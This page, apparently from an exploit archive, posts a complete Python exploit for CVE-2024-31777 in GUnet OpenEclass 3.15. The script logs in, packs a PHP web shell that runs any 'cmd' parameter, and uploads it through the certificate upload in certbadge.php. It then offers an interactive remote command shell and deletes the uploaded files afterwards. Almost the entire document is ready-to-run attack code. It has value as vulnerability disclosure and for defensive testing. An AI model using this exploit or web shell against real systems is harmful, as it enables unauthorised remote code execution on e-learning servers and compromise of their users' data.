what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution
Posted Apr 11, 2024
Authored by Georgios Tsimpidas, Frey

GUnet OpenEclass E-learning platform version 3.15 suffers from an unrestricted file upload vulnerability in certbadge.php that allows for remote command execution.

tags | exploit, remote, php, file upload
advisories | CVE-2024-31777
SHA-256 | 87510b61a4bcdb0fdc6c31f4148617866220f4cd5cc391960946f28d1c611747

GUnet OpenEclass E-learning 3.15 File Upload / Command Execution

Change Mirror Download
import requests
import argparse
import zipfile
import os
import sys

RED = '\033[91m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RESET = '\033[0m'
ORANGE = '\033[38;5;208m'

MALICIOUS_PAYLOAD = """\
<?php

if(isset($_REQUEST['cmd'])){
$cmd = ($_REQUEST['cmd']);
system($cmd);
die;
}

?>
"""

def banner():
print(f'''{RED}
{YELLOW}
============================ Author: Frey ============================
{RESET}''')

def execute_command(openeclass, filename):
while True:
# Prompt for user input with "eclass"
cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}")

# Check if the command is 'quit', then break the loop
if cmd.lower() == "quit":
print(f"{ORANGE}\nExiting...{RESET}")
clean_server(openeclass)
sys.exit()

# Construct the URL with the user-provided command
url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}"

# Execute the GET request
try:
response = requests.get(url)

# Check if the request was successful
if response.status_code == 200:
# Print the response text
print(f"{GREEN}{response.text}{RESET}")

except requests.exceptions.RequestException as e:
# Print any error that occurs during the request
print(f"{RED}An error occurred: {e}{RESET}")

def upload_web_shell(openeclass, username, password):
login_url = f'{openeclass}/?login_page=1'
login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php'

# Login credentials
payload = {
'next': '/main/portfolio.php',
'uname': f'{username}',
'pass': f'{password}',
'submit': 'Enter'
}

headers = {
'Referer': login_page_url,
}

# Use a session to ensure cookies are handled correctly
with requests.Session() as session:
# (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens
session.get(login_page_url)

# Post the login credentials
response = session.post(login_url, headers=headers, data=payload)

# Create a zip file containing the malicious payload
zip_file_path = 'malicious_payload.zip'
with zipfile.ZipFile(zip_file_path, 'w') as zipf:
zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode())

# Upload the zip file
url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert'
files = {
'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'),
'certhtmlfile': (None, ''),
'orientation': (None, 'L'),
'description': (None, ''),
'cert_id': (None, ''),
'submit_cert_template': (None, '')
}
response = session.post(url, files=files)

# Clean up the zip file
os.remove(zip_file_path)

# Check if the upload was successful
if response.status_code == 200:
print(f"{GREEN}Payload uploaded successfully!{RESET}")
return True
else:
print(f"{RED}Failed to upload payload. Exiting...{RESET}")
return False

def clean_server(openeclass):
print(f"{ORANGE}Cleaning server...{RESET}")
# Remove the uploaded files
requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip")
requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php")
print(f"{GREEN}Server cleaned successfully!{RESET}")

def main():
parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution")
parser.add_argument('-u', '--username', required=True, help="Username for login")
parser.add_argument('-p', '--password', required=True, help="Password for login")
parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass")
args = parser.parse_args()

banner()
# Running the main login and execute command function
if upload_web_shell(args.eclass, args.username, args.password):
execute_command(args.eclass, 'evil.php')

if __name__ == "__main__":
main()
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close